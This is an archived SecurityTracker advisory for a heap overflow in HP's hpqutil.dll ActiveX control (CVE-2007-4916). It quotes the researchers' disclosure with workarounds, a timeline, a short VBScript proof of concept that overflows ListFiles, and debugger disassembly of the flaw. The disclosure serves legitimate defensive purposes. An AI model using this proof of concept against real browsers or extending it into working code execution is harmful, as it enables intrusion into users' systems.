SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Generic)  >  HP Photo & Imaging Vendors:  HP (Compaq)
HP Photo Imaging Buffer Overflow in 'hpqutil.dll' ActiveX Control Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1018698
SecurityTracker URL:  http://securitytracker.com/id?1018698
CVE Reference:  CVE-2007-4916   (Links to External Site)
Updated:  Apr 18 2008
Original Entry Date:  Sep 17 2007
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:  A vulnerability was reported in HP Photo & Imaging. A remote user can cause arbitrary code to be executed on the target user's system.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a heap overflow in the 'hpqutil.dll' ActiveX control and execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

The vulnerable control is included in HP All-in-One Series Web Release and HP Photo & Imaging Gallery version 1.1.

The CLSID of the vulnerable control is: F3F381A3-4795-41FF-8190-7AA2A8102F85

The vendor was notified on June 20, 2007.

Brian Mariani, Jonathan Sarba, and the GoodFellas Security Research Team reported this vulnerability.
Impact:  A remote user can create HTML that, when loaded by the target user, will execute arbitrary code on the target user's system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.hp.com/ (Links to External Site)
Cause:  Boundary error
Underlying OS:  Windows (Any)
Reported By:  GOODFELLAS SRT <goodfellas@shellcode.com.ar>
Message History:   None.

 Source Message Contents
Date:  Fri, 14 Sep 2007 13:17:08 -0300
From:  GOODFELLAS SRT <goodfellas@shellcode.com.ar>
Subject:  [GOODFELLAS-VULN] ActiveX hpqutil!ListFiles hpqutil.dll - Remote


 

--=-pKsJoud0HdGKS5ZePDWi
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

ActiveX hpqutil!ListFiles hpqutil.dll - Remote heap overflow.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Internal ID: VULWAR200706041


introduction
------------
GOODFELLAS security research team has found a bug in a dll included in
at least the following HP products:=20

* HP All-in-One Series Web Release=20
* HP Photo & Imaging Gallery version 1.1

The affected dll is called hpqutil.dll at least in it's version
2.0.0.138 in English, and specifically the problem is a heap overflow


tested in
---------
Windows XP spanish with SP2


summary
-------


Remotable exploitation of this heap overflow  could allow a user to
execute arbitriary code or crash internet explorer. The heap overflow is
related to a call to lstrcpyA() inside a function that is not checking
the buffer's bounds.=20
This call is made from the FindFile() function the dll overloaded from
MFC42.=20
The dll allocates 320 bytes for the buffer where some arbitrarily long
user input is to be stored.
This bug is related with "FileFind class from MFC Library cause heap
overflow"
You could view more details in
http://goodfellas.shellcode.com.ar/own/VULWKU200706142=20


impact
------
This exploitable bug crashes internet explorer and if used along other=20
techniques could allow for remote code execution. Explotation requires a
targetted user to load a web page containing the crafted activeX control
with internet explorer, it is also required to have activeX enabled.


workaround
----------
- Unregistering hpqutil.dll using regsvr32
- Activate the Kill bit zero in clsid
F3F381A3-4795-41FF-8190-7AA2A8102F85


timeline
--------
june 14, 2007 -- bug discovery
june 20, 2007 -- vendor notification
July 30, 2007 -- ping ... (no response)
September 14, 2007 -- Bug published


credits
-------
* Brian Mariani <bmariani@shellcode.com.ar>
* Jonathan Sarba <sarbaj@shellcode.com.ar>
* GoodFellas Security Research Team <goodfellas.shellcode.com.ar>



Proof of concept
----------------
[...]
<object classid=3D'clsid:F3F381A3-4795-41FF-8190-7AA2A8102F85' id=3D'pAF'>
</object>
<input type=3D"button" value=3D"heap" language=3D"VBScript" OnClick=
3D"OuCh=
()">
<script language=3D"VBScript">
sub OuCh()
Var_0 =3D String(620, "A")
pAF.ListFiles Var_0
End Sub
</script>
[...]


technical detail
----------------
MFC42!CFileFind::FindFile
[...]
73d6cd3f 8bff            mov     edi,edi
73d6cd41 55              push    ebp
73d6cd42 56              push    esi
73d6cd43 57              push    edi
        =3D> ecx=3D04ecedd4
        =3D> esi=3D0795cf24

73d6cd44 8bf1            mov     esi,ecx
73d6cd46 e89effffff      call    MFC42!CFileFind::Close (73d6cce9)
73d6cd4b 6840010000      push    140h <<<=3D=3D=3D=3D  320 bytes to
allocate!!!!!
73d6cd50 e8ce73feff      call    MFC42!operator new (73d54123)
        =3D> Allocating memory for the buffer (malloc)
        =3D> eax=3D 4170ec0

73d6cd55 8b6c2414        mov     ebp,dword ptr [esp+14h]
        =3D> esp+14 has a pointer to the argument buffer (AAAAA...)

73d6cd59 83661000        and     dword ptr [esi+10h],0
73d6cd5d 85ed            test    ebp,ebp
        =3D> ebp=3D068b5064 (this is the address of the buffer)

73d6cd5f 59              pop     ecx  <<<=3D=3D=3D=3D=3D this is 140h
73d6cd60 894608          mov     dword ptr [esi+8],eax
        =3D> eax=3D04170ec0

73d6cd63 7505            jne     MFC42!CFileFind::FindFile+0x2b
(73d6cd6a) (LSTRCPY)!
        =3D> strcpy(eax, ebp) where EBP=3D"AAAAAA....\*.jpg"
        =3D> EAX  has 140h till it reaches the end of its scope

73d6cd65 bda4d0df73      mov     ebp,offset MFC42!`string' (73dfd0a4)
73d6cd6a 55              push    ebp
73d6cd6b 83c02c          add     eax,2Ch
[...]

--------------------------------
MFC42!operator new:
73d54123 8bff            mov     edi,edi
73d54125 53              push    ebx
73d54126 55              push    ebp
73d54127 8b6c240c        mov     ebp,dword ptr [esp+0Ch]
73d5412b 56              push    esi
73d5412c 57              push    edi
73d5412d 8b3de466df73    mov     edi,dword ptr [MFC42!_imp__malloc
(73df66e4)]
73d54133 83cbff          or      ebx,0FFFFFFFFh
[...]

MFC42!CFileFind::FindFile+0x2b:
73d6cd6a 55              push    ebp
73d6cd6b 83c02c          add     eax,2Ch
73d6cd6e 50              push    eax
73d6cd6f ff15d061df73    call    dword ptr [MFC42!_imp__lstrcpyA
(73df61d0)]
                        =3D> kernel32!lstrcpyA: access violation
                        =3D> vulnerable heap structure
73d6cd75 ff7608          push    dword ptr [esi+8]
73d6cd78 55              push    ebp
73d6cd79 ff15d861df73    call    dword ptr [MFC42!_imp__FindFirstFileA
(73df61d8)]
73d6cd7f 83f8ff          cmp     eax,0FFFFFFFFh
[...]

--=20
GOODFELLAS (Shellcode Security Research)
http://goodfellas.shellcode.com.ar

--=-pKsJoud0HdGKS5ZePDWi
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBG6rQEe/hId1O1+uERAo8hAJ9gg3UTbrI72r17PT0xtYtpjGf8+gCfWWBI
pENvy1XYsnyFfxgshuLbeZQ=
=7WJq
-----END PGP SIGNATURE-----

--=-pKsJoud0HdGKS5ZePDWi--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC